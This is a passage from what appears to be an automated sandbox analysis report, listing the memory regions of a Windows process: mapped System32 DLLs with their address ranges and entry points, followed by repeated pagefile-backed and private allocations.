"\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 691 start_va = 0x7ffa0ce40000 end_va = 0x7ffa0d1c1fff monitored = 0 entry_point = 0x7ffa0ce91220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 692 start_va = 0x7ffa0e210000 end_va = 0x7ffa0e2b8fff monitored = 0 entry_point = 0x7ffa0e239010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 693 start_va = 0x7ffa0e2c0000 end_va = 0x7ffa0e3cdfff monitored = 0 entry_point = 0x7ffa0e30eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 694 start_va = 0x7ffa0e3d0000 end_va = 0x7ffa0e439fff monitored = 0 entry_point = 0x7ffa0e3d9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 695 start_va = 0x7ffa0e440000 end_va = 0x7ffa0e44bfff monitored = 0 entry_point = 0x7ffa0e441470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 696 start_va = 0x7ffa0e480000 end_va = 0x7ffa0e4f6fff monitored = 0 entry_point = 0x7ffa0e482af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 697 start_va = 0x7ffa0e500000 end_va = 0x7ffa0e597fff monitored = 0 entry_point = 0x7ffa0e523980 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 698 start_va = 0x7ffa0e5a0000 end_va = 0x7ffa0e63ffff monitored = 0 entry_point = 0x7ffa0e5c56b0 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 699 start_va = 0x7ffa0e640000 end_va = 0x7ffa0e6c1fff monitored = 0 entry_point = 0x7ffa0e644ef0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 700 start_va = 0x7ffa0e6d0000 end_va = 0x7ffa0e724fff monitored = 0 entry_point = 0x7ffa0e6d3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 701 start_va = 0x7ffa0e7d0000 end_va = 0x7ffa0e849fff monitored = 0 entry_point = 0x7ffa0e7f7630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 702 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 703 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 704 start_va = 0x7ffa0ead0000 end_va = 0x7ffa0eb10fff monitored = 0 entry_point = 0x7ffa0ead4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 705 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 706 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 707 start_va = 0x7ffa0ee30000 end_va = 0x7ffa0ee90fff monitored = 0 entry_point = 0x7ffa0ee34b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 708 start_va = 0x7ffa0f190000 end_va = 0x7ffa0f221fff monitored = 0 entry_point = 0x7ffa0f1da780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 709 start_va = 0x7ffa0f340000 end_va = 0x7ffa0f36dfff monitored = 0 entry_point = 0x7ffa0f346580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 710 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 711 start_va = 0x7ffa0f470000 end_va = 0x7ffa0f9b4fff monitored = 0 entry_point = 0x7ffa0f60a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 712 start_va = 0x7ffa0f9c0000 end_va = 0x7ffa0fc2efff monitored = 0 entry_point = 0x7ffa0fa722b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 713 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 714 start_va = 0x7ffa100a0000 end_va = 0x7ffa100eafff monitored = 0 entry_point = 0x7ffa100b72b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 715 start_va = 0x7ffa100f0000 end_va = 0x7ffa102a0fff monitored = 0 entry_point = 0x7ffa101861a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 716 start_va = 0x7ffa102b0000 end_va = 0x7ffa10351fff monitored = 0 entry_point = 0x7ffa102d0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 717 start_va = 0x7ffa10360000 end_va = 0x7ffa10607fff monitored = 0 entry_point = 0x7ffa103f3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 718 start_va = 0x7ffa10610000 end_va = 0x7ffa10631fff monitored = 0 entry_point = 0x7ffa10611a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 719 start_va = 0x7ffa10660000 end_va = 0x7ffa1071dfff monitored = 0 entry_point = 0x7ffa106a2d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 720 start_va = 0x7ffa10720000 end_va = 0x7ffa10802fff monitored = 0 entry_point = 0x7ffa10757da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 721 start_va = 0x7ffa10b20000 end_va = 0x7ffa10b7cfff monitored = 0 entry_point = 0x7ffa10b26c90 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 722 start_va = 0x7ffa10b80000 end_va = 0x7ffa10bd0fff monitored = 0 entry_point = 0x7ffa10b825e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 723 start_va = 0x7ffa10be0000 end_va = 0x7ffa10c1ffff monitored = 0 entry_point = 0x7ffa10bf3750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 724 start_va = 0x7ffa10c80000 end_va = 0x7ffa10cb2fff monitored = 0 entry_point = 0x7ffa10c83800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 725 start_va = 0x7ffa10cc0000 end_va = 0x7ffa11152fff monitored = 0 entry_point = 0x7ffa10ccf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 726 start_va = 0x7ffa11160000 end_va = 0x7ffa111c6fff monitored = 0 entry_point = 0x7ffa1117e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 727 start_va = 0x7ffa111d0000 end_va = 0x7ffa1121efff monitored = 0 entry_point = 0x7ffa111d7ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 728 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 729 start_va = 0x7ffa113b0000 end_va = 0x7ffa113cbfff monitored = 0 entry_point = 0x7ffa113b37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 730 start_va = 0x7ffa113d0000 end_va = 0x7ffa11404fff monitored = 0 entry_point = 0x7ffa113d3cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 731 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 732 start_va = 0x7ffa11430000 end_va = 0x7ffa11454fff monitored = 0 entry_point = 0x7ffa11432300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 733 start_va = 0x7ffa11490000 end_va = 0x7ffa114b4fff monitored = 0 entry_point = 0x7ffa114a5220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 734 start_va = 0x7ffa114c0000 end_va = 0x7ffa114c9fff monitored = 0 entry_point = 0x7ffa114c1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 735 start_va = 0x7ffa114d0000 end_va = 0x7ffa114d9fff monitored = 0 entry_point = 0x7ffa114d2e50 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 736 start_va = 0x7ffa114e0000 end_va = 0x7ffa114f4fff monitored = 0 entry_point = 0x7ffa114e2850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 737 start_va = 0x7ffa11500000 end_va = 0x7ffa1153bfff monitored = 0 entry_point = 0x7ffa115025e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 738 start_va = 0x7ffa11540000 end_va = 0x7ffa11553fff monitored = 0 entry_point = 0x7ffa115450c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 739 start_va = 0x7ffa11580000 end_va = 0x7ffa115f8fff monitored = 0 entry_point = 0x7ffa1159fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 740 start_va = 0x7ffa11710000 end_va = 0x7ffa117a5fff monitored = 0 entry_point = 0x7ffa11735570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 741 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 742 start_va = 0x7ffa118b0000 end_va = 0x7ffa119affff monitored = 0 entry_point = 0x7ffa118f0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 743 start_va = 0x7ffa11b50000 end_va = 0x7ffa11b79fff monitored = 0 entry_point = 0x7ffa11b58b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 744 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 745 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 746 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 747 start_va = 0x7ffa123e0000 end_va = 0x7ffa123e9fff monitored = 0 entry_point = 0x7ffa123e1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 748 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 749 start_va = 0x7ffa12710000 end_va = 0x7ffa12726fff monitored = 0 entry_point = 0x7ffa127179d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 750 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 751 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 752 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 753 start_va = 0x7ffa12c50000 end_va = 0x7ffa12ce8fff monitored = 0 entry_point = 0x7ffa12c7f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 754 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 755 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 756 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 757 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 758 start_va = 0x7ffa12e20000 end_va = 0x7ffa12e74fff monitored = 0 entry_point = 0x7ffa12e37970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 759 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 760 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 761 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 762 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 763 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 764 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 765 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 766 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 767 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 768 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 769 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 770 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 771 start_va = 0x7ffa141e0000 end_va = 0x7ffa1421afff monitored = 0 entry_point = 0x7ffa141e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 772 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 773 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 774 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 775 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 776 start_va = 0x7ffa14750000 end_va = 0x7ffa147befff monitored = 0 entry_point = 0x7ffa14775f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 777 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 778 start_va = 0x7ffa14a40000 end_va = 0x7ffa14b99fff monitored = 0 entry_point = 0x7ffa14a838e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 779 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 780 start_va = 0x7ffa14c00000 end_va = 0x7ffa15028fff monitored = 0 entry_point = 0x7ffa14c28740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 781 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 782 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 783 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 784 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 786 start_va = 0x560000 end_va = 0x575fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 787 start_va = 0xfe70000 end_va = 0xfeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe70000" filename = "" Region: id = 788 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 789 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 790 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 791 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 792 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 793 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 794 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 795 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 796 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 797 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 798 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 799 start_va = 0x7f70000 end_va = 0x800ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f70000" filename = "" Region: id = 800 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 801 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 802 start_va = 0xfef0000 end_va = 0xff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fef0000" filename = "" Region: id = 803 start_va = 0xff70000 end_va = 0xffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff70000" filename = "" Region: id = 804 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 805 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 806 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 807 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 808 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 809 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 810 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 811 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 812 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 813 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 